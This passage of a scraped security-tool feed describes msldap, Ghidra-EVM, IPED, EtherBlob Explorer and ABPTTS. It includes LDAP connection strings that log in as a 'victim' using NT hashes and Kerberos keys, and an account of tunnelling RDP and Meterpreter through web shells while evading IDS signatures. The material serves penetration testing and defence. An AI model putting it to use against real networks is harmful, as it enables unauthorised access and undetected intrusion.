  • asysocks module. To support socks proxying.
  • aiocmd For the interactive client
  • asciitree For plotting nice trees in the interactive client

Usage

Please note that this is a library, and was not intended to be used as a command line program.
Whit this noted, the projects packs a fully functional LDAP interactive client. When installing the msldap module with setup.py install a new binary will appear called msldap (shocking naming conventions)


LDAP connection URL

The major change was needed in version 0.2.0 to unify different connection options as one single string, without the need for additional command line switches.
The new connection string is composed in the following manner:
<protocol>+<auth_method>://<domain>\<username>:<password>@<ip>:<port>/?<param>=<value>&<param>=<value>&...
Detailed explanation with examples:

<protocol>+<auth>://<username>:<password>@<ip_or_host>:<port>/<tree>/?<param>=<value>


<protocol> sets the ldap protocol following values supported:
- ldap
- ldaps

<auth> can be omitted if plaintext authentication is to be performed (in that case it default to ntlm-password), otherwise:
- ntlm-password
- ntlm-nt
- kerberos-password (dc option param must be used)
- kerberos-rc4 / kerberos-nt (dc option param must be used)
- kerberos-aes (dc option param must be used)
- kerberos-keytab (dc option param must be used)
- kerberos-ccache (dc option param must be used)
- sspi-ntlm (windows only!)
- sspi-kerberos (windows only!)
- anonymous
- plain
- simple
- sicily (same format as ntlm-nt but using the SICILY authentication)

<tree>:
OPTIONAL. Specifies the root tree of all quer ies

<param> can be:
- timeout : connction timeout in seconds
- proxytype: currently only socks5 proxy is supported
- proxyhost: Ip or hostname of the proxy server
- proxyport: port of the proxy server
- proxytimeout: timeout ins ecodns for the proxy connection
- dc: the IP address of the domain controller, MUST be used for kerberos authentication

Examples:
ldap://10.10.10.2 (anonymous bind)
ldaps://test.corp (anonymous bind)
ldap+sspi-ntlm://test.corp
ldap+sspi-kerberos://test.corp
ldap://TEST\\victim:<password>@10.10.10.2 (defaults to SASL GSSAPI NTLM)
ldap+simple://TEST\\victim:<password>@10.10.10.2 (SASL SIMPLE auth)
ldap+plain://TEST\\victim:<password>@10.10.10.2 (SASL SIMPLE auth)
ldap+ntlm-password://TEST\\victim:<password>@10.10.10.2
ldap+ntlm-nt://TEST\\victim:<nthash>@10.10.10.2
ldap+kerberos-password://TEST\\victim:<password> @10.10.10.2
ldap+kerberos-rc4://TEST\\victim:<rc4key>@10.10.10.2
ldap+kerberos-aes://TEST\\victim:<aes>@10.10.10.2
ldap://TEST\\victim:password@10.10.10.2/DC=test,DC=corp/
ldap://TEST\\victim:password@10.10.10.2/DC=test,DC=corp/?timeout=99&proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080&proxytimeout=44

Kudos


Ghidra-Evm - Module For Reverse Engineering Smart Contracts

$
0
0


In the last few years, attacks on deployed smart contracts in the Ethereum blockchain have ended up in a significant amount of stolen funds due to programming mistakes. Since smart contracts, once compiled and deployed, are complex to modify and update different practitioners have suggested the importance of reviewing their security in the blockchain where only Ethereum Virtual Machine (EVM) bytecode is available. In this respect, reverse engineering through disassemble and decompilation can be effective.


ghidra-EVM is a Ghidra module for reverse engineering smart contracts. It can be used to download Ethereum Virtual Machine (EVM) bytecode from the Ethereum blockchain and disassemble and decompile the smart contract. Further, it can analyze creation code, find contract methods and locate insecure instructions.

It comprises a processor module, custom loader and plugin(s) that disassembles Ethereum VM (EVM) bytecode and generates a control-flow graph (CFG) of a smart contract.

The last version uses the Ghidra 9.1.2 API. It relies on the crytic evm_cfg_builder library (https://github.com/crytic/evm_cfg_builder) to assist Ghidra in the CFG generation process.

Ghidra-evm consists of:

  • A loader that reads byte and hex code from .evm and .evm_h files respectively (See examples).
  • The SLEIGH definition of the EVM instruction set taking into account the Ghidra core limitations (See Notes).
  • A helper script that uses evm_cfg_builder and ghidra_bridge in order to assist ghidra generating the CFG and exploring the function properties of a smart contract.
  • A collection of scripts that help to reverse engineering different aspects of a smart contract:
ScriptDescription
search_codecopy.pyWhen analyzing creation code in a smart contract we can only see the _dispatcher function that uses CODECOPY in order to write the run time code into memory. This script looks for useful CODECOPY instructions and finds the smart contract methods hidden in the runtime part of the contract.
search_dangerous_instructions.pyInstructions such as CALL, CALLCODE, SELFDESTRUCT and DELEGATECALL can sometimed be abused to transfer funds to another contract. This script finds them and creates a label for each occurrence.
load_external_contract.pyDownloads smart contract byte code from the blockchain into a .evm_h file that can be loaded into ghidra-evm

Installation instructions

Compilation instructions

The contents of the ghidra-evm directory can be used to create a Ghidra module in Eclipse with processor and loader in order to extend or debug ghidra_evm.


Tutorials


 

TutorialDescription
UtilizationSimple utilization instructions with test.evm
Analyzing creation bytecodeUsing search_codecopy.py to analyze creation code and finding hidden methods
Looking for dangerous instructionsUsing search_dangerous_instructions.py to analyze a SELFDESTRUCT ocurrence
Downloading smart contract bytecode from the blockchain into GhidraUsing load_external_contract.py to download EVM byte code from the blockchain into a .evm_h file

Integration with external symbolic execution tools
ScriptDescription
teetherIt marks the critical path in Ghidra before generating the exploit. Requires teether.

Notes
  • The CFG is created according to evm_cfg_builder: JUMP and JUMPI instructions are utilized.
  • A jump table of 32x32 (evm_jump_table) is generated accordingly in order to detect and show branches in the disassembly and control flow windows.
  • Ghidra has not been designed to deal with architectures and memories of wordsize > 64-bit. This means that instructions such as PUSH32 are not correctly shown in the decompilation window.

License

Ghidra-evm is licensed and distributed under the AGPLv3.


Thanks

This work was supported by the European Commission through the H2020 Programme’s Project M-Sec under Grant 814917.



IPED - Digital Forensic Tool - Process And Analyze Digital Evidence, Often Seized At Crime Scenes By Law Enforcement Or In A Corporate Investigation By Private Examiners

$
0
0

IPED is an open source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners.


Introduction

IPED - Digital Evidence Processor and Indexer (translated from Portuguese) is a tool implemented in java and originally and still developed by digital forensic experts from Brazilian Federal Police since 2012. Although it was always open source, only in 2019 its code was officially published.

Since the beginning, the goal of the tool was efficient data processing and stability. Some key characteristics of the tool are:

  • Command line data processing for batch case creation
  • Multiplatform support, tested on Windows and Linux systems
  • Portable cases without installation, you can run them from removable drives
  • Integrated and intuitive analysis interface
  • High multithread performance and support for large cases: up to 135 million items as of 12/12/2019

Currently IPED uses the Sleuthkit Library only to decode disk images and file systems, so the same image formats are supported: RAW/DD, E01, ISO9660, AFF, VHD, VMDK. Also there is support for UDF(ISO), AD1 (AccessData) and UFDR (Cellebrite) formats. Recently support for APFS was added, thanks to BlackBag implementation for Sleuthkit.

If you are new to the tool, please refer to the Beginner's Start Guide.


Building

To build from source, you need git, maven and java 8 (Oracle or OpenJDK+JFX) installed. Run:

git clone https://github.com/sepinf-inc/IPED.git
cd IPED
mvn install

It will generate a snapshot version of IPED in target/release folder.

On Linux you also must build The Sleuthkit and additional dependencies. Please refer to Linux Section

If you want to contribute to the project, refer to Contributing


Features

Some of IPED several features are listed below:

  • Supported hashes: md5, sha-1, sha-256, sha-512 and edonkey. PhotoDNA is also available for law enforcement (please contact iped@dpf.gov.br)
  • Fast hash deduplication, NIST NSRL, ProjectVIC and LED hashset lookup
  • Signature analysis
  • Categorization by file type and properties
  • Recursive container expansion of dozens of file formats
  • Image and video gallery for hundreds of formats
  • Georeferencing of GPS data (needs Google Maps Javascript API key)
  • Regex searches with optional script validation for credit cards, emails, urls, money values, bitcoin, ethereum, ripple wallets...
  • Embedded hex, unicode text, metadata and native viewers
  • File content and metadata indexing and fast searching, including unknown files and unallocated space
  • Efficient data carving engine (takes < 10% processing time) that scans much more than unallocated, with support for +40 file formats, including videos, extensible by scripting
  • Optical Character Recognition powered by tesseract 4
  • Encryption detection for known formats and using entropy test
  • Processing profiles: forensic, pedo (csam), triage, fastmode (preview) and blind (for automatic data extraction)
  • Detection for +70 languages
  • Named Entity Recognition (needs Stanford CoreNLP models to be downloaded)
  • Customizable filters based on any file metadata
  • Similar document search with configurable threshold
  • Similar image search, using internal or external image
  • Powerful file grouping (clustering) based on ANY metadata
  • Support for multicases up to 135 million items
  • Extensible with javascript and python (including cpython extensions) scripts
  • External command line tools integration for file decoding
  • Browser history for Edge, Firefox, Chrome and Safari
  • Custom parsers for Emule, Shareaza, Ares, WhatsApp, Skype, Telegram, Bittorrent, ActivitiesCache, and more...
  • Fast nudity detection for images and videos using random forests algorithm (thanks to its author Wladimir Leite)
  • Nudity detection using Yahoo open-nsfw deeplearning model (needs keras and jep)
  • Audio Transcription, implementations with Azure and Google Cloud services
  • Graph analysis for communications (calls, emails, instant messages...)
  • Stable processing with out-of-process file system decoding and file parsing
  • Resuming or restarting of stopped or aborted processing (--continue/--restart options)
  • Web API for searching remote cases, get file metadata, raw content, decoded text, thumbnails and posting bookmarks
  • Creation of bookmarks/tags for interesting data
  • HTML, CSV reports and portable cases with tagged data


Etherblob-Explorer - Search And Extract Blob Files On The Ethereum Blockchain Network

$
0
0


Search and extract blob files on the Ethereum network using Etherscan.io API.


Introduction

EtherBlob Explorer is a tool intended for researchers, analysts, CTF players or anyone curious enough wanting to search for different kinds of files or any meaningful human-supplied data on the Ethereum Blockchain Network. It searches over a user-supplied range of block IDs or UNIX timestamps on any of the 5 available networks: MainNet, Görli, Kovan, Rinkeby and Ropsten.

For a real-life case you can read this experiment made on 2017. The immutability of the blockchain can truly be a double-edged sword.


Installation

Run the following command:

$ pip install git+https://github.com/litneet64/etherblob-explorer.git

Now it's ready to use from your CLI, you can find some common usage examples below!


Features
Networks

Search on any of the five Ethereum Networks:

  • MainNet
  • Görli
  • Kovan
  • Rinkeby
  • Ropsten

Search Locations

This tool can search on the following locations, either separately or combining any of these on the same run:

  • Transaction Input Data: search inside transaction's input data (default location).
  • Block Input Data: search inside block's input data.
  • Contract Storage: search inside a contract's storage array on the first N 32-byte sized positions, treating it all as one big data string.
  • To Addresses: search appending 'to' addresses as the possible input [*] (checking first for file headers and re-checking when all data is harvested using binwalk).

[*] Storing data on 'to' addresses is possible on the Ethereum network as there's no verification if sending to an address that has no associated account keys. Meaning you can make transactions to arbitrary addresses to craft a payload over several 20-byte sized transactions (it's very rare but so are some CTF challenges).


Search and Extraction Methods

All of these methods can be used either separately or in any combination:

  • Embedded Files: search for files embedded inside data using binwalk.
  • File Headers / Magic Bytes: search using headers + magic bytes via levaraging the Linux util file (default method).
  • ASCII String Dump: search for ASCII strings inside data.
  • Entropy-Based Search: use Shannon's Entropy as a measure tool to search for natural language text (e.g. UTF-8 Unicode), encrypted/compressed files or anything the user seems viable with user-supplied entropy limits.

IMPORTANT: The order showed here is used under-the-hood for discarding searches with other methods (e.g. if file is found via embedded files then it won't attempt to search using file headers, ascii string dump nor entropy) as it's not likely to find anything meaningful if previous methods were already successful.


Misc
  • Accepts UNIX timestamps (instead of block IDs) that get resolved into the closest block IDs commited at those times.
  • Save all data from visited transactions into file for later reviewing.
  • Store CLI-displayed logs into file for later extracted-file analysis.
  • Ignore user-supplied file formats (case-insensitive) for extraction and accepts substrings of the complete file format for blacklisting.
  • Print general progress metrics (e.g. how many blocks / transactions have been parsed, how many blocks are left) every minute and also display some interesting metrics at the end of the current run.
  • More useful features found on the manual (-h)!

Usage

Common use cases
  • Standard search (search inside transactions via file headers) on MainNet with API key on default location (.api-key) and between these two block IDs (inclusive):
$ etherblob 4081599 4081600
  • More "in-through" search (search for embedded files + regular search method) on goerli network with key inside arbitrary file:
$ etherblob -K api.key 3134050 3145570 -M -H --network goerli
  • Search over block headers and transactions at the same time and save extracted files to 'extracted':
$ etherblob 4081599 4081600 --blocks --transactions -D extracted/
  • Search only inside 'to' addresses in range from blocks commited between Jan 25 2021 19:00:00 and Jan 26 2021 19:00:00:
$ etherblob -t 1611601200 1611687600 --addresses
  • Search strings only on contracts' storage and for the first 4 storage array positions (128 bytes worth of data):
$ etherblob 3911697 3912697 -S --contracts -C 4
  • Search only inside transactions for encrypted/compressed data (ignoring any other file format):
$ etherblob 4081599 4081600 --encrypted
  • Search inside transactions for custom entropy files while saving transactions into file:
$ etherblob  3911697 3912697 -E 4.0 5.0 -s
  • Only dump ASCII strings over blocks and transactions made on Christmas Eve (between the 24th and 25th):
$ etherblob -t 1608836400 1608922800 --blocks --transactions --strings
  • Full-blown search (slow, expect many false-positives):
$ etherblob 4081599 4081600 -U -S -M -H --blocks --transactions --addresses --contracts

Advanced Use Cases

There are more explanations for advanced usage cases and the things found with them on the wiki!


Manual
usage: etherblob [-h] [--transactions] [--blocks] [--addresses] [--contracts]
[--network {main,goerli,kovan,rinkeby,ropsten}] [-H] [-M] [-U] [-E CUSTOM_ENTROPY CUSTOM_ENTROPY]
[--encrypted] [-S] [-C CONTRACT_POSITION] [-t] [-K API_KEY_PATH] [-k API_KEY] [-D OUTPUT_DIR]
[-o OUT_LOG] [-s] [-i [IGNORED_FMT [IGNORED_FMT ...]]] [--version]
start_block end_block

Tool to search and extract blob files on the Ethereum Network.

positional arguments:
start_block Start of block id range.
end_block End of block id range.

optional arguments:
-h, --help show this help message and exit
--transactions Search for blob files on transaction inputs. Default search mode.
--blocks Search for blob files on block inputs. If enabled then transaction input check is disabled unless
explicitly enabled.
--addresses Search for blob files on 'to' transaction addresses, as on Ethereum anyone can make transactions
to an arbitrary address even if it has no related owner (still not very common). If enabled then
transaction's input check is disabled unless explicitly enabled.
--contracts Search for blob files on contract's storage. If enabled then transaction input check is disabled
unless explicitly enabled.
--network {main,goerli,kovan,rinkeby,ropsten}, -N {main,goerli,kovan,rinkeby,ropsten}
Choose blockchain network to search in. Available choices are Main, Goerli (Görli), Kovan, Rinkeby
and Ropsten. MainNet is the default network. Case-insensitive.
-H, --file-header If enabled, search for file formats via magic bytes/file headers on data (from blocks,
transactions or addresses). Enabled by default unless another method is enabled too.
-M, --embedded If enabled, search for embedded files on data (from blocks, transactions or addresses) via
binwalk. Disabled by default as parsing now takes longer.
-U, --unicode If enabled, attempt to search and dump files containing UTF-8 text from harvested data (blocks,
transactions, addresses) using Shannon's Entropy (between 3.5 and 5.0) if no other discernible
file is found first on that data. Yields many false positives.
-E CUSTOM_ENTROPY CUSTOM_ENTROPY, --custom-entropy CUSTOM_ENTROPY CUSTOM_ENTROPY
Define your own entropy limits (min and max) to search for files/data on harvested data.
--encrypted If enabled, attempt to sear ch and dump encrypted/compressed data found via different search
methods (blocks, transactions, addresses) using Shannon's Entropy (between 7.0 and 8.0) if no
other discernible file is found first on that data.
-S, --strings If enabled, attempt to search and dump ASCII strings into files found inside harvested data
(blocks, transactions, addresses) if no other discernible file is found first on that data.
-C CONTRACT_POSITION, --contract-position CONTRACT_POSITION
Search inside contract's data until reaching the (N-1)th position on its storage array. Positions
contain 32 bytes worth of data. Count starts at 0 and default pos is the 15th pos (16 indexes in
total) if no custom position is given.
-t, --timestamps If enabled, then start and end block IDs are interpreted as UNIX timestamps th at are then resolved
to the closest commited blocks for those specific times.
-K API_KEY_PATH, --api-key-path API_KEY_PATH
Path to file with Etherscan API key for queries. Default search location is '.api-key'.
-k API_KEY, --api-key API_KEY
Etherscan API key as parameter. If given then '--api-key-path' is ignored.
-D OUTPUT_DIR, --output-dir OUTPUT_DIR
Out-dir for extracted files. Default is 'ext_{start block}-{end block}'.
-o OUT_LOG, --out-log OUT_LOG
Out-file for logs. Default is 'etherblob_{start block}-{end block}.log'.
-s, --save-transactions
If enabled, all transactions and their info are stored at file 'transactions_{start-block}-{end-
block}.txt'
-i [IGNORED_FMT [IGNORED_FMT ...]], --ignored-fmt [IGNORED_FMT [IGNORED_FMT ...]]
Ignored file formats for extraction. Default ignored/common file formats are 'ISO-8859 text' and
'Non-ISO extended-ASCII text'. The 'data' file format is always ignored. Accepts file format
substrings and makes case-insensitive matches. '*' is a wildcard to ignore all file formats.
--version show program's version number and exit

Official GitHub repo 'https://github.com/litneet64/etherblob-explorer'


ABPTTS - TCP Tunneling Over HTTP/HTTPS For Web Application Servers

$
0
0


A Black Path Toward The Sun

(TCP tunneling over HTTP for web application servers)

https://www.blackhat.com/us-16/arsenal.html#a-black-path-toward-the-sun

Ben Lincoln, NCC Group, 2016

ABPTTS uses a Python client script and a web application server page/package[1] to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server. In other words, anywhere that one could deploy a web shell, one should now be able to establish a full TCP tunnel. This permits making RDP, interactive SSH, Meterpreter, and other connections through the web application server.


The communication is designed to be fully compliant with HTTP standards, meaning that in addition to tunneling in through a target web application server, it can be used to establish an outbound connection through packet-inspecting firewalls.

A number of novel features are used to make detection of its traffic challenging. In addition to its usefulness to authorized penetration testers, it is intended to provide IDS/WPS/WAF developers with a safe, live example of malicious traffic that evades simplistic regex-pattern-based signature models.

An extensive manual is provided in PDF form, and walks the user through a variety of deployment scenarios.

This tool is released under version 2 of the GPL.

[1] Currently JSP/WAR and ASP.NET server-side components are included.

Compare and contrast with:

Named as an oblique reference to Cordyceps/Ophiocordyceps, e.g.: http://www.insectimages.org/browse/detail.cfm?imgnum=0014287



Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>